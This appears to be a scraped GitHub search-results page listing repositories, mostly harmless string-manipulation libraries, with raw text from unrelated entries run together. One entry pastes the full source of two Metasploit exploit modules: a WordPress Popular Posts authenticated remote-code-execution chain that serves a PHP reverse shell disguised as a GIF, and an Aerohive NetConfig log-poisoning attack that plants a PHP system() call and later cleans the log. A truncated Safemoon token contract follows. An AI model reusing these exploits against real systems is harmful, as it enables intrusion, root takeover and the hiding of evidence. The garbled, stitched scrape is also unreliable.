282 skills found · Page 7 of 10
dart-archive / SmokeSmoke is a Dart package that exposes a reduced reflective system API. This API includes accessing objects in a dynamic fashion (read properties, write properties, and call methods), inspecting types (for example, whether a method exists), and symbol/string convention.
ClaudiaRojasSoto / Testing PracticeExercise on unit testing in JavaScript using Jest. Includes tests for string length, string reversal, and calculator methods. Implementation of calculator class/object. TDD approach for capitalize function.
Nate0634034090 / Nate158g M W N L P D A O E### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HTTP::Wordpress def initialize(info = {}) super( update_info( info, 'Name' => 'Wordpress Popular Posts Authenticated RCE', 'Description' => %q{ This exploit requires Metasploit to have a FQDN and the ability to run a payload web server on port 80, 443, or 8080. The FQDN must also not resolve to a reserved address (192/172/127/10). The server must also respond to a HEAD request for the payload, prior to getting a GET request. This exploit leverages an authenticated improper input validation in Wordpress plugin Popular Posts <= 5.3.2. The exploit chain is rather complicated. Authentication is required and 'gd' for PHP is required on the server. Then the Popular Post plugin is reconfigured to allow for an arbitrary URL for the post image in the widget. A post is made, then requests are sent to the post to make it more popular than the previous #1 by 5. Once the post hits the top 5, and after a 60sec (we wait 90) server cache refresh, the homepage widget is loaded which triggers the plugin to download the payload from our server. Our payload has a 'GIF' header, and a double extension ('.gif.php') allowing for arbitrary PHP code to be executed. }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die', # msf module 'Simone Cristofaro', # edb 'Jerome Bruandet' # original analysis ], 'References' => [ [ 'EDB', '50129' ], [ 'URL', 'https://blog.nintechnet.com/improper-input-validation-fixed-in-wordpress-popular-posts-plugin/' ], [ 'WPVDB', 'bd4f157c-a3d7-4535-a587-0102ba4e3009' ], [ 'URL', 'https://plugins.trac.wordpress.org/changeset/2542638' ], [ 'URL', 'https://github.com/cabrerahector/wordpress-popular-posts/commit/d9b274cf6812eb446e4103cb18f69897ec6fe601' ], [ 'CVE', '2021-42362' ] ], 'Platform' => ['php'], 'Stance' => Msf::Exploit::Stance::Aggressive, 'Privileged' => false, 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Automatic Target', {}] ], 'DisclosureDate' => '2021-06-11', 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp', 'WfsDelay' => 3000 # 50 minutes, other visitors to the site may trigger }, 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, CONFIG_CHANGES ], 'Reliability' => [ REPEATABLE_SESSION ] } ) ) register_options [ OptString.new('USERNAME', [true, 'Username of the account', 'admin']), OptString.new('PASSWORD', [true, 'Password of the account', 'admin']), OptString.new('TARGETURI', [true, 'The base path of the Wordpress server', '/']), # https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L560 OptString.new('SRVHOSTNAME', [true, 'FQDN of the metasploit server. Must not resolve to a reserved address (192/10/127/172)', '']), # https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L584 OptEnum.new('SRVPORT', [true, 'The local port to listen on.', 'login', ['80', '443', '8080']]), ] end def check return CheckCode::Safe('Wordpress not detected.') unless wordpress_and_online? checkcode = check_plugin_version_from_readme('wordpress-popular-posts', '5.3.3') if checkcode == CheckCode::Safe print_error('Popular Posts not a vulnerable version') end return checkcode end def trigger_payload(on_disk_payload_name) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path), 'keep_cookies' => 'true' ) # loop this 5 times just incase there is a time delay in writing the file by the server (1..5).each do |i| print_status("Triggering shell at: #{normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wordpress-popular-posts', on_disk_payload_name)} in 10 seconds. Attempt #{i} of 5") Rex.sleep(10) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wordpress-popular-posts', on_disk_payload_name), 'keep_cookies' => 'true' ) end if res && res.code == 404 print_error('Failed to find payload, may not have uploaded correctly.') end end def on_request_uri(cli, request, payload_name, post_id) if request.method == 'HEAD' print_good('Responding to initial HEAD request (passed check 1)') # according to https://stackoverflow.com/questions/3854842/content-length-header-with-head-requests we should have a valid Content-Length # however that seems to be calculated dynamically, as it is overwritten to 0 on this response. leaving here as notes. # also didn't want to send the true payload in the body to make the size correct as that gives a higher chance of us getting caught return send_response(cli, '', { 'Content-Type' => 'image/gif', 'Content-Length' => "GIF#{payload.encoded}".length.to_s }) end if request.method == 'GET' on_disk_payload_name = "#{post_id}_#{payload_name}" register_file_for_cleanup(on_disk_payload_name) print_good('Responding to GET request (passed check 2)') send_response(cli, "GIF#{payload.encoded}", 'Content-Type' => 'image/gif') close_client(cli) # for some odd reason we need to close the connection manually for PHP/WP to finish its functions Rex.sleep(2) # wait for WP to finish all the checks it needs trigger_payload(on_disk_payload_name) end print_status("Received unexpected #{request.method} request") end def check_gd_installed(cookie) vprint_status('Checking if gd is installed') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'GET', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 res.body.include? ' gd' end def get_wpp_admin_token(cookie) vprint_status('Retrieving wpp_admin token') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'GET', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'tools' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 /<input type="hidden" id="wpp-admin-token" name="wpp-admin-token" value="([^"]*)/ =~ res.body Regexp.last_match(1) end def change_settings(cookie, token) vprint_status('Updating popular posts settings for images') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' }, 'vars_post' => { 'upload_thumb_src' => '', 'thumb_source' => 'custom_field', 'thumb_lazy_load' => 0, 'thumb_field' => 'wpp_thumbnail', 'thumb_field_resize' => 1, 'section' => 'thumb', 'wpp-admin-token' => token } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Unable to save/change settings') unless /<strong>Settings saved/ =~ res.body end def clear_cache(cookie, token) vprint_status('Clearing image cache') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' }, 'vars_post' => { 'action' => 'wpp_clear_thumbnail', 'wpp-admin-token' => token } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 end def enable_custom_fields(cookie, custom_nonce, post) # this should enable the ajax_nonce, it will 302 us back to the referer page as well so we can get it. res = send_request_cgi!( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'post.php'), 'cookie' => cookie, 'keep_cookies' => 'true', 'method' => 'POST', 'vars_post' => { 'toggle-custom-fields-nonce' => custom_nonce, '_wp_http_referer' => "#{normalize_uri(target_uri.path, 'wp-admin', 'post.php')}?post=#{post}&action=edit", 'action' => 'toggle-custom-fields' } ) /name="_ajax_nonce-add-meta" value="([^"]*)/ =~ res.body Regexp.last_match(1) end def create_post(cookie) vprint_status('Creating new post') # get post ID and nonces res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'post-new.php'), 'cookie' => cookie, 'keep_cookies' => 'true' ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 /name="_ajax_nonce-add-meta" value="(?<ajax_nonce>[^"]*)/ =~ res.body /wp.apiFetch.nonceMiddleware = wp.apiFetch.createNonceMiddleware\( "(?<wp_nonce>[^"]*)/ =~ res.body /},"post":{"id":(?<post_id>\d*)/ =~ res.body if ajax_nonce.nil? print_error('missing ajax nonce field, attempting to re-enable. if this fails, you may need to change the interface to enable this. See https://www.hostpapa.com/knowledgebase/add-custom-meta-boxes-wordpress-posts/. Or check (while writing a post) Options > Preferences > Panels > Additional > Custom Fields.') /name="toggle-custom-fields-nonce" value="(?<custom_nonce>[^"]*)/ =~ res.body ajax_nonce = enable_custom_fields(cookie, custom_nonce, post_id) end unless ajax_nonce.nil? vprint_status("ajax nonce: #{ajax_nonce}") end unless wp_nonce.nil? vprint_status("wp nonce: #{wp_nonce}") end unless post_id.nil? vprint_status("Created Post: #{post_id}") end fail_with(Failure::UnexpectedReply, 'Unable to retrieve nonces and/or new post id') unless ajax_nonce && wp_nonce && post_id # publish new post vprint_status("Writing content to Post: #{post_id}") # this is very different from the EDB POC, I kept getting 200 to the home page with their example, so this is based off what the UI submits res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'ctype' => 'application/json', 'accept' => 'application/json', 'vars_get' => { '_locale' => 'user', 'rest_route' => normalize_uri(target_uri.path, 'wp', 'v2', 'posts', post_id) }, 'data' => { 'id' => post_id, 'title' => Rex::Text.rand_text_alphanumeric(20..30), 'content' => "<!-- wp:paragraph -->\n<p>#{Rex::Text.rand_text_alphanumeric(100..200)}</p>\n<!-- /wp:paragraph -->", 'status' => 'publish' }.to_json, 'headers' => { 'X-WP-Nonce' => wp_nonce, 'X-HTTP-Method-Override' => 'PUT' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Post failed to publish') unless res.body.include? '"status":"publish"' return post_id, ajax_nonce, wp_nonce end def add_meta(cookie, post_id, ajax_nonce, payload_name) payload_url = "http://#{datastore['SRVHOSTNAME']}:#{datastore['SRVPORT']}/#{payload_name}" vprint_status("Adding malicious metadata for redirect to #{payload_url}") res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_post' => { '_ajax_nonce' => 0, 'action' => 'add-meta', 'metakeyselect' => 'wpp_thumbnail', 'metakeyinput' => '', 'metavalue' => payload_url, '_ajax_nonce-add-meta' => ajax_nonce, 'post_id' => post_id } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Failed to update metadata') unless res.body.include? "<tr id='meta-" end def boost_post(cookie, post_id, wp_nonce, post_count) # redirect as needed res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'keep_cookies' => 'true', 'cookie' => cookie, 'vars_get' => { 'page_id' => post_id } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 || res.code == 301 print_status("Sending #{post_count} views to #{res.headers['Location']}") location = res.headers['Location'].split('/')[3...-1].join('/') # http://example.com/<take this value>/<and anything after> (1..post_count).each do |_c| res = send_request_cgi!( 'uri' => "/#{location}", 'cookie' => cookie, 'keep_cookies' => 'true' ) # just send away, who cares about the response fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 res = send_request_cgi( # this URL varies from the POC on EDB, and is modeled after what the browser does 'uri' => normalize_uri(target_uri.path, 'index.php'), 'vars_get' => { 'rest_route' => normalize_uri('wordpress-popular-posts', 'v1', 'popular-posts') }, 'keep_cookies' => 'true', 'method' => 'POST', 'cookie' => cookie, 'vars_post' => { '_wpnonce' => wp_nonce, 'wpp_id' => post_id, 'sampling' => 0, 'sampling_rate' => 100 } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 201 end fail_with(Failure::Unreachable, 'Site not responding') unless res end def get_top_posts print_status('Determining post with most views') res = get_widget />(?<views>\d+) views</ =~ res.body views = views.to_i print_status("Top Views: #{views}") views += 5 # make us the top post unless datastore['VISTS'].nil? print_status("Overriding post count due to VISITS being set, from #{views} to #{datastore['VISITS']}") views = datastore['VISITS'] end views end def get_widget # load home page to grab the widget ID. At times we seem to hit the widget when it's refreshing and it doesn't respond # which then would kill the exploit, so in this case we just keep trying. (1..10).each do |_| @res = send_request_cgi( 'uri' => normalize_uri(target_uri.path), 'keep_cookies' => 'true' ) break unless @res.nil? end fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless @res.code == 200 /data-widget-id="wpp-(?<widget_id>\d+)/ =~ @res.body # load the widget directly (1..10).each do |_| @res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php', 'wp-json', 'wordpress-popular-posts', 'v1', 'popular-posts', 'widget', widget_id), 'keep_cookies' => 'true', 'vars_get' => { 'is_single' => 0 } ) break unless @res.nil? end fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless @res.code == 200 @res end def exploit fail_with(Failure::BadConfig, 'SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful') if datastore['SRVHOST'] == '0.0.0.0' cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD']) if cookie.nil? vprint_error('Invalid login, check credentials') return end payload_name = "#{Rex::Text.rand_text_alphanumeric(5..8)}.gif.php" vprint_status("Payload file name: #{payload_name}") fail_with(Failure::NotVulnerable, 'gd is not installed on server, uexploitable') unless check_gd_installed(cookie) post_count = get_top_posts # we dont need to pass the cookie anymore since its now saved into http client token = get_wpp_admin_token(cookie) vprint_status("wpp_admin_token: #{token}") change_settings(cookie, token) clear_cache(cookie, token) post_id, ajax_nonce, wp_nonce = create_post(cookie) print_status('Starting web server to handle request for image payload') start_service({ 'Uri' => { 'Proc' => proc { |cli, req| on_request_uri(cli, req, payload_name, post_id) }, 'Path' => "/#{payload_name}" } }) add_meta(cookie, post_id, ajax_nonce, payload_name) boost_post(cookie, post_id, wp_nonce, post_count) print_status('Waiting 90sec for cache refresh by server') Rex.sleep(90) print_status('Attempting to force loading of shell by visiting to homepage and loading the widget') res = get_widget print_good('We made it to the top!') if res.body.include? payload_name # if res.body.include? datastore['SRVHOSTNAME'] # fail_with(Failure::UnexpectedReply, "Found #{datastore['SRVHOSTNAME']} in page content. Payload likely wasn't copied to the server.") # end # at this point, we rely on our web server getting requests to make the rest happen endend### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Aerohive NetConfig 10.0r8a LFI and log poisoning to RCE', 'Description' => %q{ This module exploits LFI and log poisoning vulnerabilities (CVE-2020-16152) in Aerohive NetConfig, version 10.0r8a build-242466 and older in order to achieve unauthenticated remote code execution as the root user. NetConfig is the Aerohive/Extreme Networks HiveOS administrative webinterface. Vulnerable versions allow for LFI because they rely on a version of PHP 5 that is vulnerable to string truncation attacks. This module leverages this issue in conjunction with log poisoning to gain RCE as root. Upon successful exploitation, the Aerohive NetConfig application will hang for as long as the spawned shell remains open. Closing the session should render the app responsive again. The module provides an automatic cleanup option to clean the log. However, this option is disabled by default because any modifications to the /tmp/messages log, even via sed, may render the target (temporarily) unexploitable. This state can last over an hour. This module has been successfully tested against Aerohive NetConfig versions 8.2r4 and 10.0r7a. }, 'License' => MSF_LICENSE, 'Author' => [ 'Erik de Jong', # github.com/eriknl - discovery and PoC 'Erik Wynter' # @wyntererik - Metasploit ], 'References' => [ ['CVE', '2020-16152'], # still categorized as RESERVED ['URL', 'https://github.com/eriknl/CVE-2020-16152'] # analysis and PoC code ], 'DefaultOptions' => { 'SSL' => true, 'RPORT' => 443 }, 'Platform' => %w[linux unix], 'Arch' => [ ARCH_ARMLE, ARCH_CMD ], 'Targets' => [ [ 'Linux', { 'Arch' => [ARCH_ARMLE], 'Platform' => 'linux', 'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp', 'CMDSTAGER::FLAVOR' => 'curl' } } ], [ 'CMD', { 'Arch' => [ARCH_CMD], 'Platform' => 'unix', 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_openssl' # this may be the only payload that works for this target' } } ] ], 'Privileged' => true, 'DisclosureDate' => '2020-02-17', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION ] } ) ) register_options [ OptString.new('TARGETURI', [true, 'The base path to Aerohive NetConfig', '/']), OptBool.new('AUTO_CLEAN_LOG', [true, 'Automatically clean the /tmp/messages log upon spawning a shell. WARNING! This may render the target unexploitable', false]), ] end def auto_clean_log datastore['AUTO_CLEAN_LOG'] end def check res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'index.php5') }) unless res return CheckCode::Unknown('Connection failed.') end unless res.code == 200 && res.body.include?('Aerohive NetConfig UI') return CheckCode::Safe('Target is not an Aerohive NetConfig application.') end version = res.body.scan(/action="login\.php5\?version=(.*?)"/)&.flatten&.first unless version return CheckCode::Detected('Could not determine Aerohive NetConfig version.') end begin if Rex::Version.new(version) <= Rex::Version.new('10.0r8a') return CheckCode::Appears("The target is Aerohive NetConfig version #{version}") else print_warning('It should be noted that it is unclear if/when this issue was patched, so versions after 10.0r8a may still be vulnerable.') return CheckCode::Safe("The target is Aerohive NetConfig version #{version}") end rescue StandardError => e return CheckCode::Unknown("Failed to obtain a valid Aerohive NetConfig version: #{e}") end end def poison_log password = rand_text_alphanumeric(8..12) @shell_cmd_name = rand_text_alphanumeric(3..6) @poison_cmd = "<?php system($_POST['#{@shell_cmd_name}']);?>" # Poison /tmp/messages print_status('Attempting to poison the log at /tmp/messages...') res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'login.php5'), 'vars_post' => { 'login_auth' => 0, 'miniHiveUI' => 1, 'authselect' => 'Name/Password', 'userName' => @poison_cmd, 'password' => password } }) unless res fail_with(Failure::Disconnected, 'Connection failed while trying to poison the log at /tmp/messages') end unless res.code == 200 && res.body.include?('cmn/redirectLogin.php5?ERROR_TYPE=MQ==') fail_with(Failure::UnexpectedReply, 'Unexpected response received while trying to poison the log at /tmp/messages') end print_status('Server responded as expected. Continuing...') end def on_new_session(session) log_cleaned = false if auto_clean_log print_status('Attempting to clean the log file at /tmp/messages...') print_warning('Please note this will render the target (temporarily) unexploitable. This state can last over an hour.') begin # We need remove the line containing the PHP system call from /tmp/messages # The special chars in the PHP syscall make it nearly impossible to use sed to replace the PHP syscall with a regular username. # Instead, let's avoid special chars by stringing together some grep commands to make sure we have the right line and then removing that entire line # The impact of using sed to edit the file on the fly and using grep to create a new file and overwrite /tmp/messages with it, is the same: # In both cases the app will likely stop writing to /tmp/messages for quite a while (could be over an hour), rendering the target unexploitable during that period. line_to_delete_file = "/tmp/#{rand_text_alphanumeric(5..10)}" clean_messages_file = "/tmp/#{rand_text_alphanumeric(5..10)}" cmds_to_clean_log = "grep #{@shell_cmd_name} /tmp/messages | grep POST | grep 'php system' > #{line_to_delete_file}; "\ "grep -vFf #{line_to_delete_file} /tmp/messages > #{clean_messages_file}; mv #{clean_messages_file} /tmp/messages; rm -f #{line_to_delete_file}" if session.type.to_s.eql? 'meterpreter' session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi' session.sys.process.execute('/bin/sh', "-c \"#{cmds_to_clean_log}\"") # Wait for cleanup Rex.sleep 5 # Check for the PHP system call in /tmp/messages messages_contents = session.fs.file.open('/tmp/messages').read.to_s # using =~ here produced unexpected results, so include? is used instead unless messages_contents.include?(@poison_cmd) log_cleaned = true end elsif session.type.to_s.eql?('shell') session.shell_command_token(cmds_to_clean_log.to_s) # Check for the PHP system call in /tmp/messages poison_evidence = session.shell_command_token("grep #{@shell_cmd_name} /tmp/messages | grep POST | grep 'php system'") # using =~ here produced unexpected results, so include? is used instead unless poison_evidence.include?(@poison_cmd) log_cleaned = true end end rescue StandardError => e print_error("Error during cleanup: #{e.message}") ensure super end unless log_cleaned print_warning("Could not replace the PHP system call '#{@poison_cmd}' in /tmp/messages") end end if log_cleaned print_good('Successfully cleaned up the log by deleting the line with the PHP syscal from /tmp/messages.') else print_warning("Erasing the log poisoning evidence will require manually editing/removing the line in /tmp/messages that contains the poison command:\n\t#{@poison_cmd}") print_warning('Please note that any modifications to /tmp/messages, even via sed, will render the target (temporarily) unexploitable. This state can last over an hour.') print_warning('Deleting /tmp/messages or clearing out the file may break the application.') end end def execute_command(cmd, _opts = {}) print_status('Attempting to execute the payload') send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'action.php5'), 'vars_get' => { '_action' => 'list', 'debug' => 'true' }, 'vars_post' => { '_page' => rand_text_alphanumeric(1) + '/..' * 8 + '/' * 4041 + '/tmp/messages', # Trigger LFI through path truncation @shell_cmd_name => cmd } }, 0) print_warning('In case of successful exploitation, the Aerohive NetConfig web application will hang for as long as the spawned shell remains open.') end def exploit poison_log if target.arch.first == ARCH_CMD print_status('Executing the payload') execute_command(payload.encoded) else execute_cmdstager(background: true) end endend
ikelaiah / Stringkit FpComprehensive string manipulation library providing 60+ static methods for validation, case conversion, pattern matching, fuzzy algorithms, phonetic matching, text analysis, and web encoding. Zero external dependencies - uses only Free Pascal RTL.
xperiandri / StringBuilderExtensionsString Builder Extensions is a set of extension methods for System.Text.StringBuilder that provide the same functionality as corresponding methods of System.String.
merisahakyan / ExtensionsForStringExtension methods for String ( .ToArmenian() .ReplaceEmoticons() .IsPalindrome() c# extensions )
Anders429 / SubstringA substring method for string types.
fincode / HTTPSnifferHTTPSniffer is a packet sniffer tool that captures all HTTP requests/responses sent between the Web browser and the Web server. For every HTTP request, the following information is displayed: Host Name, HTTP method (GET, POST, HEAD), URL Path, User Agent, Response Code, Response String, Content Type, Referer, Content Encoding, Transfer Encoding, Server Name, Content Length, Cookie String, and more
JeongHaeun3263 / Javascript String Methods Cheat SheetNo description available
liyu1981 / Jstring.ziga reusable string lib for myself with all familiar methods methods can find in javascript string
ericboehs / To SlugExtends ruby's String class and adds a "to_slug" method. It makes ugly strings URL friendly
Mamesoft / ToNumberThis is adding toDouble and toFloat method for String.
Gouravspopale / GPYTHONThis repository contains basic of python language with all Built in function and (CSV_FILE)projects
himedlooff / Media Query To TypeA method for creating an IE specific stylesheet that allows the content of media queries to become accessible to Internet Explorer 8 and below. This process uses LESS string interpolation to convert media queries into media types which are supported back to IE6.
basta1255s / Owntoken.solSkip to content Why GitHub? Team Enterprise Explore Marketplace Pricing Search Sign in Sign up safemoonprotocol / Safemoon.sol 476618 Code Issues 62 Pull requests 4 Actions Projects Wiki Security Insights Safemoon.sol/Safemoon.sol @safemoonprotocol safemoonprotocol Create Safemoon.sol Latest commit 152e907 on Mar 4 History 1 contributor 1166 lines (997 sloc) 42.3 KB /** *Submitted for verification at BscScan.com on 2021-03-01 */ /** *Submitted for verification at BscScan.com on 2021-03-01 */ /** #BEE #LIQ+#RFI+#SHIB+#DOGE = #BEE #SAFEMOON features: 3% fee auto add to the liquidity pool to locked forever when selling 2% fee auto distribute to all holders I created a black hole so #Bee token will deflate itself in supply with every transaction 50% Supply is burned at start. */ pragma solidity ^0.6.12; // SPDX-License-Identifier: Unlicensed interface IERC20 { function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address recipient, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom(address sender, address recipient, uint256 amount) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); } /** * @dev Wrappers over Solidity's arithmetic operations with added overflow * checks. * * Arithmetic operations in Solidity wrap on overflow. This can easily result * in bugs, because programmers usually assume that an overflow raises an * error, which is the standard behavior in high level programming languages. * `SafeMath` restores this intuition by reverting the transaction when an * operation overflows. * * Using this library instead of the unchecked operations eliminates an entire * class of bugs, so it's recommended to use it always. */ library SafeMath { /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { uint256 c = a + b; require(c >= a, "SafeMath: addition overflow"); return c; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return sub(a, b, "SafeMath: subtraction overflow"); } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b <= a, errorMessage); uint256 c = a - b; return c; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) { return 0; } uint256 c = a * b; require(c / a == b, "SafeMath: multiplication overflow"); return c; } /** * @dev Returns the integer division of two unsigned integers. Reverts on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return div(a, b, "SafeMath: division by zero"); } /** * @dev Returns the integer division of two unsigned integers. Reverts with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b > 0, errorMessage); uint256 c = a / b; // assert(a == b * c + a % b); // There is no case in which this doesn't hold return c; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * Reverts when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return mod(a, b, "SafeMath: modulo by zero"); } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * Reverts with custom message when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b != 0, errorMessage); return a % b; } } abstract contract Context { function _msgSender() internal view virtual returns (address payable) { return msg.sender; } function _msgData() internal view virtual returns (bytes memory) { this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691 return msg.data; } } /** * @dev Collection of functions related to the address type */ library Address { /** * @dev Returns true if `account` is a contract. * * [IMPORTANT] * ==== * It is unsafe to assume that an address for which this function returns * false is an externally-owned account (EOA) and not a contract. * * Among others, `isContract` will return false for the following * types of addresses: * * - an externally-owned account * - a contract in construction * - an address where a contract will be created * - an address where a contract lived, but was destroyed * ==== */ function isContract(address account) internal view returns (bool) { // According to EIP-1052, 0x0 is the value returned for not-yet created accounts // and 0xc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470 is 